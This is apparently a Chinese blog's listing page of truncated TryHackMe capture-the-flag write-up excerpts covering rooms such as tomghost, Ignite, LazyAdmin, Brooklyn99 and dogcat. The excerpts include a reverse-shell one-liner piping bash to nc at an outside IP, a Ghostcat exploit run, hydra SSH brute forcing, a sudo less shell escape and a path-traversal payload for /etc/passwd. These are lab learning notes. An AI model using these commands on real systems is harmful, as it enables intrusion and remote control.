MoonlitSyntax

tomghost
tomghost
发表于 | TryHackMe
扫到tomcat,看名字也应该是 稍微百度一下就知道这个漏洞了 poc地址 CVE-2020–1938 p4 python3 ajpShooter.py http://10.10.90.130:8080 8009 /WEB-INF/web.xml read[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/aarch64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16 _ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) ...
Cyborg
Cyborg
发表于 | TryHackMe
Starting Nmap 7.60 ( https://nmap.org ) at 2024-01-28 07:42 GMTNmap scan report for ip-10-10-190-220.eu-west-1.compute.internal (10.10.190.220)Host is up (0.00065s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c: ...
Ignite
Ignite
发表于 | TryHackMe
信息搜集 只开了80 爆破一下 额,不用爆破 一进去就是http://10.10.14.74/一个cms 可以直接search 拉下来后直接getshell 用这个奇怪的反弹shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.14.69.58 9999 >/tmp/f 弹过去了后信息搜集 其实直接用那个poc也能搜集到 $db['default'] = array( 'dsn' => '', 'hostname' => 'localhost', 'username' => 'root', 'password' => 'mememe', 'database' => 'fuel_s ...
LazyAdminFinal
LazyAdminFinal
发表于 | TryHackMe
没啥用 爆破得到一个Content目录,再爆一次得到他下面的目录 as里有用的 inc里是有些文件和目录,在一个数据库备份里找到 解密出来是Password123,登录上去看看 登录成功,竟然还有中文,贴心( searchsploit -m 40700 Exploit: SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution URL: https://www.exploit-db.com/exploits/40700 Path: /usr/share/exploitdb/exploits/php/webapps/40700.html Codes: N/A Verified: TrueFile Type: HTML document, ASCII textCopied to: /tmp/40700.html 工具就是好用,直接searchsploit <html><body onload="document.exploit.submit();&quo ...
Skynet
Skynet
发表于 | TryHackMe
Starting Nmap 7.60 ( https://nmap.org ) at 2024-01-28 13:14 GMTNmap scan report for ip-10-10-0-56.eu-west-1.compute.internal (10.10.0.56)Host is up (0.021s latency).Not shown: 994 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3 ...
c4ptur3-th3-fl4g
c4ptur3-th3-fl4g
发表于 | TryHackMe
c4n y0u c4p7u23 7h3 f149就是幻视成单词就行 01101100 01100101 01110100 01110011 00100000 01110100 01110010 01111001 00100000 01110011 01101111 01101101 01100101 00100000 01100010 01101001 01101110 01100001 01110010 01111001 00100000 01101111 01110101 01110100 00100001 二进制转10进制再转Ascii 额,不写了,都可以用cb解决,就是最后一个是b64->Morse->rot47->十进制 牛逼啊,layer添加光谱,放大,flag就出来了 ──(root㉿kali)-[/home/kali/Desktop]└─# steghide extract -sf stegosteg.jpgEnter passphrase: wrote extracted data to "steganopayload2248.txt& ...
Wonderland
Wonderland
发表于 | TryHackMe
中等咯 竟然只有两个问题 ===============================================================root@ip-10-10-0-129:~# nmap -sV -sC 10.10.47.106Starting Nmap 7.60 ( https://nmap.org ) at 2024-01-28 08:35 GMTNmap scan report for ip-10-10-47-106.eu-west-1.compute.internal (10.10.47.106)Host is up (0.028s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 ...
Brooklyn99 CTF
Brooklyn99 CTF
发表于 | TryHackMe
傻了,你妈的 hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.229.236 ssh -t 4 爆破ssh为啥这里要说影写啊,你妈的 6 sudo -l less有sudo权限 sudo less /etc/profile!/bin/sh 结束了
Relevant
Relevant
发表于 | TryHackMe
打开是个windows,nmap扫描了一下smb enum4linux不能运作? smbclient -L 10.10.99.122 列出共享服务,有个磁盘,继续列出 smbclient \\\\10.10.99.122\\nt4wrksv 发现有个密码,拿下来看看 Qm9iIC0gIVBAJCRXMHJEITEyMw==QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk 一眼b64 拿下来看看 之前扫的不够仔细,其实还有很多端口是开着的 这里还有一个web服务,去爆破一下目录 gobuster dir -u http://10.10.99.122:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 扫个大点的 额.反正扫出来就是上面展示的那个磁盘的目录 http://10.10.99.122:49663/nt4wrksv/passwords.txt这个就是我们刚刚访问的文件 接下来是windows内容,不怎么会,边看边学 .aspx扩展以在II ...
Net Sec Challenge
Net Sec Challenge
发表于 | TryHackMe
root@ip-10-10-205-25:~# nmap -sV -sC 10.10.156.93Starting Nmap 7.60 ( https://nmap.org ) at 2024-01-29 06:28 GMTNmap scan report for ip-10-10-156-93.eu-west-1.compute.internal (10.10.156.93)Host is up (0.00042s latency).Not shown: 995 closed portsPORT STATE SERVICE VERSION22/tcp open ssh (protocol 2.0)| fingerprint-strings: | NULL: |_ SSH-2.0-OpenSSH_8.2p1 THM{946219583339}80/tcp open http lighttpd|_http-server-header: lighttpd THM{web_serve ...
Vulnerability Capstone
Vulnerability Capstone
发表于 | TryHackMe
hhhhhh写过了,CVE-2018-16763 秒了
dogcat
dogcat
发表于 | TryHackMe
http://10.10.128.14/?view=../../../../etc/passwd%00dog 串中要含有dog或cat然后又会在串的最后加上.php后缀 <!DOCTYPE HTML><html><head> <title>dogcat</title> <link rel="stylesheet" type="text/css" href="/style.css"></head><body> <h1>dogcat</h1> <i>a gallery of various dogs or cats</i> <div> <h2>What would you like to see?</h2> <a href="/?view=dog"><b ...
avatar
dionysus
我醉欲眠卿且去
文章
306
标签
10
分类
8
此心安处
公告
最新文章
离开贴吧
离开贴吧
有点难受
有点难受
梦
复习一下反序列化 cc1-cc7
复习一下反序列化 cc1-cc7
Fastjson
Fastjson
分类
标签
awdMacwebtoolsjavanodejspython审计sqlxss
归档